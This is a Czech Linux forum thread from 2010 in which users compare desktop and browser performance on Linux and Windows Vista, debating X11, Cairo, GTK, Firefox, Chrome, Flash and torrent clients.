    Ono není třeba žádných vědeckých benchmarků. Kromě toho, že je to často vidět pouhým okem, stačí prostě stejnou (nejlépe dlouhou) stránku rychle posouvat nahoru a dolů v různých prohlížečích a sledovat vytížení procesoru. To je velmi kvalitní ukazatel rychlosti. Protože právě u prohlížeče, který má to vytížení nejvyšší, už pak stačí vytížení ještě pošoupnout blíž ke stovce, tedy posouvat delší nebo graficky složitější stránkou (nebo mít současně spuštěný jiný program, který si nějaká procenta vezme pro sebe) a už to posouvání dokumentem prostě nestíhá a posuvník zaostává za kurzorem myši. Tohle třeba z Windows neznám, tam to má vždycky rezervu. Na Linuxu je to běžná denní praxe.
    28.8.2010 12:53 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Jestli se nepletu, tak to byl tento test:
    A dokáže tenhle test rozlišit, jestli prohližeč doopravdy scrolluje, nebo jestli obraz překresluje po delších časových intervalech? Pokud nedokáže, tak číslo, které naměří, o rychlosti GUI vypovídá pramálo...
    Mimochodem, skoro všichni, kteří ho zkoušeli, svorně hlásili, že Chrome je suverénně nejpomalejší.
    Připočtěte si tedy, prosím, jeden hlas pro opačný názor :) Právě jsem si Chrome a Firefox zkusil porovnat: rychlost scrollování stejná (ani u jednoho nemám pocit, že by scrollování bylo čímkoliv bržděno), zato přepnutí na jiný tab v Chrome bez pozorovatelného zpoždění, ve Firefoxu odhadem 200ms (což už je citelné zpomalení).

    (Na okraj dodávám, že i když mi Chrome přijde daleko rychlejší, stejně většinou používám Firefox, protože Vimperator je prostě návykový :) )
    To je velmi kvalitní ukazatel rychlosti.
    Jediný dobrý ukazatel rychlosti je, jestli při běžném použití programu (na systému tak zatíženém, jak ho obvykle mám), musím na program čekat nebo nikoliv.

    [Váš argument nefunguje, protože pro každý program existuje nějaké vytížení počítače, ve kterém bude program nepoužitelně pomalý. Naopak některé programy se mohou zatížení procesoru přizpůsobovat a pokud zjistí, že je výkonu málo, mohou překreslovat méně často atd.]
    27.8.2010 23:48 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Na X11 všichni rádi nadávají, ale málokdo se pustí do opravdového profilování, aby se přesvědčil, že ho zpomaluje opravdu X11.

    Co se tyka prohlizece, kdys si pustim prohlizec Epiphany, a zobrazim nejakou stranku s aktivnim javascriptem periodicky menicim (a tedy prekreslujicim) stranku a vedle si pustim top, tak casto vidim rozdeleni CPU pul na pul mezi X server a Epiphany.
    27.8.2010 23:50 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Což má mnoho možných výkladů, jeden z těch přímočařejších je ten, že Epiphany nejspíš generuje řádově více Xkových requestů, než by bylo potřeba.
    27.8.2010 23:53 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    (na okraj: vytížení CPU zobrazované topem je bohužel v případech častého přepínání kontextu, jako třeba právě u X11, nezřídka zatíženo obrovskou chybou)
    gtz avatar 28.8.2010 00:00 gtz | skóre: 27 | blog: gtz | Brno
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    No ono plně postačuje otevřít v FF nebo v Epiphany nějaký photo blog kde jsou nasázené velké obrázky. Prohlížeč je celý jako by tuhýk a skrolování je utrpením. Arora/Chrome jsou na tom o něco lépe.
    - nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
    28.8.2010 00:03 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Jinak i jednoduchy x11perf benchmark ukazuje obcas dost zbesile vykonostni regrese grafickych ovladacu v X, viz tento muj davny komentar ukazujici, ze pri 'vhodne' kombinaci software a driveru je vykreslovani textu treba cca 500* pomalejsi nez je mozne (vysledky jsou pres rok a pul stare, tak snad uz se situace trochu zlepsila).
    28.8.2010 00:37 J. M. | skóre: 23 | blog: JMblog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    No, jestli se neýlím, tak to je zrovna ta doba, kdy Intel přešel z EXA na UXA, což v prvních měsících mělo katastrofální následky, ale postupně to snad vyladili.

    Horší jsou trvalé, nezvratné následky. Za těch 11 let, co používám Linux, jsem zažil spoustu takových skoků, kdy prostě nějaká změna v architektuře něčeho způsobila, že má třeba najednou veškerá grafika jednou provždy dojnásobnou režii. Že třeba vykreslování textu přes Xft/fontconfig je několikanásobně pomalejší než core X text, a vzhledem k tomu, že všechny aplikace postupně během let přešly na „modernější, lepší“ fontconfig, tak už není cesty zpět, lze se jen smířit s definitivně pomalým textem (posledně mě to bolelo u Emacsu, který na fontconfig přešel až někdy loni, a tím se scrolování a vykreslování textu v něm několikanásobně zpomalilo).

    Takže když už byla řeč o otloukáknovi Firefoxu (který mimochodem má sice pomalé GUI, ale vlastní vykreslování stránek, tedy Gecko, je na mém Linuxu nejrychlejší ze všech prohlížečů, žádný WebKit se mu nemůže rovnat), tak bych snad jenom odcitoval člověka z Mozilly, který o výkonu na různých platformách řekl toto:

    „Obecně, API, která máme na Windows, jsou lepší a bohatší, než co máme na jiných platformách. Například: co se týče Linuxu, Cairo a Pixman měly být rychlé, ale bohužel ta podpůrná infrastruktura se nikdy nestala rychlá. Na OS X jsme docela rychlí, ale Direct2D dává momentálně výkonnostní výhodu Windows.“

    To je myslím hezké shrnutí. Celou dobu, co používám Linux, se píše o tom, že se pracuje na optimalizaci výkonu grafiky, na tom, že XRender konečně bude akcelerovat (a ne zpomalovat, jak to dělá dosud), že Cairo bude rychlé, že přidáme nová rozšíření X serveru, která všechno vyřeší... Celých 10 let je to jen čekání na Godota. Celých 10 let se jenom píše, že se na tom pracuje, a ono se na tom skutečně pracuje, ale výsledek se prostě nedostavil.
    28.8.2010 12:58 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Celou dobu, co používám Linux, se píše o tom, že se pracuje na optimalizaci výkonu grafiky,
    Zde se velmi lišíme v názoru na to, kde jsou nejužší hrdla. Pokud si zkusíte téměř libovolnou "moderní" Xkovou aplikaci spustit po hodně pomalé lince, všimnete si například, že spoustu věcí překresluje mnohokrát po sobě. Tento jednoduchý experiment ukazuje, že obrovské výkonové rezervy jsou i v toolkitech. Toto ovoce visí daleko níže, ale nikdo se mu moc nevěnuje a všichni raději nadávají na X11 a snaží se vymyslet, jak kreslení zrychlit, místo aby přemýšleli nad tím, jestli se náhodou 90% kreslících operací neprovádí úplně zbytečně.
    28.8.2010 14:39 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    a všichni raději nadávají na X11
    Ono na GTK by slo take nadavat pekne dlouho :–)
    28.8.2010 00:15 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Určitou šancí do budoucna jsou jen projekty, které co nejvíc obcházejí pomalé X.org, a tím grafiku výrazně urychlují. Jako cairo-drm, které, ač zatím experimentální, tak oproti standardnímu Cairu, které nepoužívá přímé vykreslování a kreslí přes X.org
    Jenze proti Cairu je rychle asi uplne vsechno - i prime pouziti X renderu. Napr. jednoduchy benchmark alphablendujici obdelnikove pixmapy me vychazel asi 15* rychlejsi pri primem pouziti X renderu nez pri pouziti Caira.
    Grunt avatar 28.8.2010 13:42 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Já si zas pamatuju dobu kdy se všechny tyto problémy lidstva sváděli na GTK. Dneska je to X. Jsem zvědavý co bude příště. (zvláštní ovšem je, že všechno se to vždy týkalo jen Firefoxu)
    Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
    Fluttershy, yay! avatar 27.8.2010 15:57 Fluttershy, yay! | skóre: 92 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    1. V KDE je úžasné klikátko na nastavení. Jo, větší citlivost by se mi občas líbila, ve Woknouzzz nevím, jak to je... ale spíš to tady bude věc hardwaru, a nezajímá mě to.
    2. Flash nepoužívám, stejně nevím o snad žádném jeho užitečném využití. TyTrubko už taky funguje s HTML5 a na porno na jiných trubkách čumět nepotřebuju.
    3. Firefox je obecně lemra líná. Doporučuju třeba Operu -- nebo cokoliv jiného. Sice u mě je pomalá, ale to je úsporným nastavením přístupů k disku.
    4. Torrenty nepoužívám a aplikace mi přijdou obecně v pohodě.
    🇵🇸Touch grass🇺🇦 ✊ no gods, no masters
    27.8.2010 16:52 Woknař
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Děkuji snad za první objektivní názor Linuxáka o Windows. Pochopitelně to zdaleka není všechno, ale i tak dík za objektivitu, která je u komunity vůči majoritnímu softu velmi vzácná a spíše nevídaná.
    otasomil avatar 27.8.2010 17:56 otasomil | skóre: 39 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)

    >>> Děkuji snad za první objektivní názor Linuxáka o Windows.

    To teda moc nazory nectete ... tak mozna na zive.cz

     

    Problem rozepri neni dokonalost resp nedokonalost jednoho ci druheho systemu, ale obecny problem ve vztahu majorit a minorit.

    Cesti nemaji radi romy, heterosexualove nemaji radi teplouse .... a tak bychom mohli pokracovat dal a dal s tim ze semtam se najdou vyjimky ... cech ma za nejlepsiho kamarada roma, se kterym chodi na pivo a je to fakt super borec, heterosexual ma za nejlepsiho kamaraa gaye a chodej spolu na pivo a je to jeho nejlepsi kamarad ........

    K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
    27.8.2010 18:05 Woknař
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Ale čtu... a zrovna Živě.cz už dlouho ne, pretože tam exhibuje istý súdruh Kozec zo zahraničia a ten je tak namistrovanej, že ho opravdu nemusí skoro nikdo... Ale tady si to probírám dost často.
    otasomil avatar 27.8.2010 18:20 otasomil | skóre: 39 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)

    >>> a ten je tak namistrovanej, že ho opravdu nemusí skoro nikdo

    No vidite. Nakonec je problem jen v par lidech tak co to resit.

    >>> Ale tady si to probírám dost často.

    To je spravne pac je treba byt v IT vseobecne informovan a OS nezavisly.

    K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
    27.8.2010 18:26 pedro
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    No ja si nemyslim, ze top doba byla 2006-07, spis tipuji, ze to je takove subjektivni hodnoceni - mas Linux par let a zacinas se nudit. To je alespon muj odhad.

    Ad. Flash - blbost, choval se divne akorat s gtk-2.18 a to proto, ze v gtk byl bug. A platilo to naposled nekdy v zime.

    Ad. Firefox - jo, Mozilla to vyviji primarne pro Windows a je tam lepsi. Ale muzes pouzivat jiny browser. Mimochodem zase az takovy rozdil to neni, ja pouzivam Firefox a nestezuji si.

    Ad. Torrent - to je hodne divne, spis tipuju problem jinde, trebe iptables? Jako ze je pro Linux malo torrent klientu, to jsi snad ani nemohl myslet vazne.

    Jine aplikace "jdou lip" - takovou aplikaci s vyjimkou toho Firefoxu bud neznam nebo nejsou opensource. Naopak opensource aplikace jdou na Widlich zpravidla bidne, pokud se to vubec nekdo namahal portovat.

    Konecne kazdy OS ma svoje mouchy. Widows je maji taky.
    27.8.2010 20:07 kuba77 | skóre: 15 | blog: kuba77
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    k bodu 4:

    No vidíš a já jsem dnes v Debianu Sid přes Transmission stahoval torrent rychlostí 600kB/s - 1060kB/s :-) A to mám net 6 Mbit/s a ve windowsech mi stahování nikdy víc než 700kB/s nejde. A to to nebylo poprvé. Když jsem měl před pár lety doma net 4 Mbit/s tak si pamatuju, že jeden torrent se stahoval rychlostí 1100kB/s v Ubuntu 8.04 a Transmission.

    k bodu 3:

    no osobně třeba Opera se mi zdá v Linuxu línější než ve Windows. Když kliknu na nějaký odkaz tak to trvá než se začne stránka načítat ale pak se zobrazí bleskově, když jsem pak na jednom webu déle tak když se pohybuju jen po tom jednom webu tak už je to rychlé (jako kdyby se obsah načetl do cache). Verze 10.10 mi přijde línější míň, 10.60 víc a u 10.70 mi to přijde zas o něco lepší..
    gtz avatar 27.8.2010 22:49 gtz | skóre: 27 | blog: gtz | Brno
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    FF a Flash se občas sekne, když se na to podívám blíže, má to na svědomí npviewer.bin. Někdy to spadne na segmentation fault ..., po restartu FF procesu to zase nějak jede. I když FF jede na Vistách rychleji než na Suse. FF používám jen velice málo jinak používám Chrome k plné spokojenosti.

    VISTY používají Prefetch Cache, touto jejich funkcí je start aplikací rychlejší.

    Mně spíše štve, že pro spoustu zařízení prostě nejsou ty správné drivery a to, že výrobci prostě na Linux prdí. Proto také spousta lidí používají nadále Widle a neuvažují o změně.
    - nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
    Grunt avatar 28.8.2010 13:47 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    A já vím čím to je:

    :-D
    Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.